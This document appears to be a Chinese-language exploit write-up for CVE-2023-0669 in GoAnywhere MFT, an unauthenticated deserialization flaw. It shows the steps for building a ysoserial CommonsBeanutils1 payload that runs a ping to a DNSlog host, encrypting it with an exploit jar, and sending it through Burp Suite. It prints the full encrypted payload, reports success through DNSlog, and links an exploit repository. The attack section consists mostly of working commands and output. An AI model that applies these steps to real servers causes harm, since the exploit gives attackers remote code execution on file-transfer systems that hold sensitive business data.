GoAnywhereMFT
GoAnywhereMFT 是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为 XML、EDI、CSV 和 JSON 数据库。
GoAnywhereMFT <= 7.1.2
由于直接运行 jar 包会报错,所以尝试采用 burpsuite 手工操作
下载 ysoserial
执行 mvn clean package -DskipTests 编译出 ysoserial-0.0.6-SNAPSHOT-all.jar
生成 payload
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "ping f33196d9.dns.1433.eu.org" > payload.ser
加密
java -jar CVE-2023-0669.jar -e ./payload.ser
得到
1
2
3
4
5
6
7
8
9
10
11
|
➜ Downloads java -jar CVE-2023-0669.jar -e ./payload.ser
_______ ________ ___ ____ ___ _____ ____ _____ _____ ____
/ ____/ | / / ____/ |__ \ / __ \__ \|__ / / __ \/ ___// ___// __ \
/ / | | / / __/________/ // / / /_/ / /_ <______/ / / / __ \/ __ \/ /_/ /
/ /___ | |/ / /__/_____/ __// /_/ / __/___/ /_____/ /_/ / /_/ / /_/ /\__, /
\____/ |___/_____/ /____/\____/____/____/ \____/\____/\____//____/
[*] Files expected to be encrypted: ./payload.ser
[*] Version Encryption: 1
[+] Successful encryption: Jh88_jqGQWSbZmiCc1DErQhwOhCTLkYmA1yXgf86Ha5HF9IfVuQMLOfBS_fjlP7wTTEg2-Jx9nBDyFUKVTroXpFBt7zN1XDX58VKZCxCXlUD45d4laUUnNuzdyvNLT2b_gYKBi2-ny7fc2lOHNgalYV13mQzCTs0EgEUE9AuDUIMcFYx00pv4g4EOgEjeWbAx40rTtRby71AxapyXKy-4XChDHVlPB1AV3njBKGWT6gHdPxT8hb75Ycrpjdk9EQ1v4XlsWf2pcEuH1eHc_2CHlgeErjMGfXyXh9lNdrEoAOtw1UQOnhxT8clRjShGbSJSjIqgD8WyLRI0WsHnhdxBEgW8AluKnVsysck6loZL29Z9aaH-P4kvMzNqVmnIcvZ1_h3RLrtpSkbAbHXO0x0OpfU6f4T7xkoeMKt18mECpB1b_wIptrx4zYgHBYPwrmdjqyvCd_hfgIUWZ78QxN6-lffTHygs1TkMThebklF8vPAvqbye3LbxSo7BZ0NqSJpc8w4cdBYH2cYRVYBbiZvks_xiNTair_iGeK4RvzRnXhIwqwvY-5r0jf1Tb38rQY69pgKSwNFpPbkVJEUowSYIgldWMvTJo5I3ajtAeHHQKsClreyH0k86avvdtW4CpT-5GzUGCh3Ot5m35kFlJUPwkO2mIlGFGMmzjCi8SRurhahWTINnx1hyr_V8LrDNnf6IQ6mgnWdAJmN8F_vWvChrcUsFkHCzltO3B4IG3nLfqkc0N7aXkCfXO3ctiJDSv0uLfdQX1jflBFybUmoFWPCWgjrNVRR6RoHLzs-gINzBrHyQEo40WpgjiDXx4o8A_fdJExVpQLzXTBfLGRWgYrmF7fNAlxU2il9uilOC0TZ4KdM8EAWqPCmGTnYtUDKj50r_OWbRowM4Oxbq3m0B7WzJqwGPSFdXS5SgNGbHY5BnoYwGzpQ_ySYohzulCcB-EWfJoXX9BVz2jcyVjiBW4WNucHU_MkmEh709mAL7HqY02GGdZqJNgiLqa6ar2uabUSivxKfzFP2rr-9nVkhM68SUeHk6xnlnLB1wFmvrPJ1QcLVCBo2oetHpXKFR3KuqOHZ8sHmEAcx92fFiRV49nO1b1bFl9lcIEuOqPIvIIPjvaczd78QBKcaT26Cz2kSi_TbRJYU-mAp49vL_dpcamGhcZe33NWOiiLouVfrCaTLUP9hCCBDN_cRl9ohZG4KbNy0Mn_IQd4NW-l3kpsiAvT1e6lcENdPx_1RDSSGUzhkhyXOuXEXZ3EpUL1aENn6-r1Mg6Hm4ZR0KNnEOs09ZNppXGmioPi5QTouBVxbK4o8NPUxEd0vJHuWrdYn8CvLpe3th00WjuBf5nDRUJWbcDeMlhXdsN58mkR4-niRrwL6973ReoxSSDHbojPsIzTMtVhL-Bn0v_LrQqZuXrtsMqSXSjpPAXGP64P5vDEoRLtc1dcVDMZOC6zZWRW-H0PkVxzL_A3DwGicJ7fIjlApY6axgxfD9HS-lAJ5znf0s0O7aDY4zRv-CC55mNP8lMhY4rDsRGFHhfbJ8MbvzXzbgyErrcBb_7OEPYmjDkYN4eroHZY5ssyXcvb42tioNlyHwTRsn4v1RAJFZ56Q9mSplJ6616smxrHEdtI9YP7ulaQTjJuaW6W1ivdJCo6Fq60q36KLDL7Tcnx0BZKfp8sVDr7sX2m6wL5DwZDdDj1HDXaPOLu1h-hk3yb4uYvh6NXz4uXfK2aESJVZ1UAyIWWQ4YSGAliJ0yRH9cgWTsTu6Wv5h0sv5jFrll_yItgN58mEYuWVFN0BjLUgCM7pl4nn3wcjJr5aSG1XEDKxKlTJAER9t6m4IFy_HtRsgawTNEw6Oq9EOTqpNFivnfqJ5_BRvpj4-tIyxTfBhxNN2EgH4jp_9EN4BNHkfwjs2UCpdX7o4jWEjn5geo41Y0OPiFS2ZRN2eqx7xthpecrRL8qhDNhKCFmfrpLd9DXtCJDNEEiLBqiApH4pGEJgv3SjacCLINBAf-CmHI4rR16Lx1UT8ZTjrABEnVgL12SnEg_yV9eGcxqUvbRlFVy22v7egCfgYBzQCW0WtHMg5tEMA8PmLTwgMkv9i_NcYih0N-RhnEnWl0nep8_R7kzARGpy-PgElgenhL8nSPDguf7yGDu9q8l9NszwvpkJ2Jizak3viwSWv6xeChgMbGVCCD4uwYdNVYjLC999mKTj6fbD4tGm63Envf2G-HIan3l-Y9LOCAwSCOg9Y4axwdyMl2-ZXnSDd2rFrp1FakdkEtV_P49Db6Gp6ySf4CwChlzeeHKzUoAzDpdi4vu7UupT4gu_5M4eGAEMEF5l8CyoE1TR1ena7UEaKEyEwYXfCLIUJTv1lvShGHgU8AyL0eRxIqIaJLwQUp9yAvBd0kJNh94tr9c9hVXxYrcNGQFpYh_vcXOC6_a9KYjFDfOrzjeelVZvFTbN04YbC_4FaIzcWC460QBnvxQ1HD-YpGLV39hyitRYAPOhdGrZYJoBcCBssNRsOke2b-94wuFizpEHsbe08NezeWTnNo1TcaNgyA2NZWZL_ljZkDwSyMKLv2dRRGDUPeIZJ7_AD3ZGxR4uMVoKgi0j8p8b19AduKebcHdadxUd3Oxdj2DPhQOUM-BwwZ--tEu83lxboT4poklU-tyBJxL-EsgQK8Uje3KOcikSI1zV8qFEiMhpjMd1cErCmcMhqQcP1PYBziY7I7R4Frc3TpgCWTxFb1iSV9zf3kfENb9zhLCiW1GCj99OfNKjXUpdxtWRJ7ILZtkPNBpmBfrw3pabgno1_8IAsY4NKuicKt9lR0MqhdiRq-TGvlp_HyaZQpkBAByyvr7o2xrBvpXhy9p2iqKl4W_vV61ZQB4GYDAZcqOOd0lTyGd-UJbMBN7-nEvwAl6sAnYyMhLVw1mSuUP5BKQsuBRWeEGsDueV_gf_PaObRjZ8ZG_l0vezyPhmFfbjs9k-HM_a_uluTTpQutNKF1AJd9_dVC0lQDDEhAOwOYo0XZFCo6NTv_Bgub7_VGx2pEY23HY3ojgXUoTmnK4Cskj6DWFwQtRO3649a8uprAp0rgZKY7ls_QOGHeB-jqMq79IjX_gyyqDl8Pi1e3AKPNC3Gwn_zL0ckI4g4CzstumiD_uWYmWYvv-X4qBqIhUuPZp1o_4y_u0pnRf9UT8fk1TjGdg9AeHTgdG2R8DN8xKR-JkB_afpAAWyXNjqF3C0-BExuBnlkSG1lXWxAehxFgPkOtu1VTzIyCyGcJt5drbPb4CTFqzeHyyMD__LQrd3erXo0fNdc3b9lSljUVxuWaWlSO5b_WRNmzTgxbvFIwrOGvYBdtnyzR0s7unImVr4mWiaK16j4BclZOCBzF4GUkrDCbR8TgeoJoMkT0GrbcpkbpH7D0vCHyx-4AmpQU_hFUIBndqrPSdtdnxyRv1B2xjPENVTCR7xTf4LR467ERrVFsx5YhHncG_oXpeqFhyHxYACHZ0UcTTB-FNjGnJ2MSP2gpMHgJ_SMSY4nZlEUfibgkJyIXBQXMTsbMAVM1P_hP5j6R9entav4MSPjwjvMuzQAFOyGd_ScoyY2aRUpFKr4ThasJ5khIqzsMNapE7-WaejGREIU0-yTxiyPmRUtDgMHtHpwiYPZ5mRMxdItR7KQVWkHqL9Hma9uMHWJgQsCfhlr6bWL66C6geJSt1I-yXVujKiw1QoBlitYTsF0Rqrx3patwE1Ou-ekLXgPqUUOYtxIg==
|
‘这里使用的原图’
访问 DNSLOG 平台可以看到 payload 利用成功
EXP:https://github.com/lavaicer/CVE-2023-0669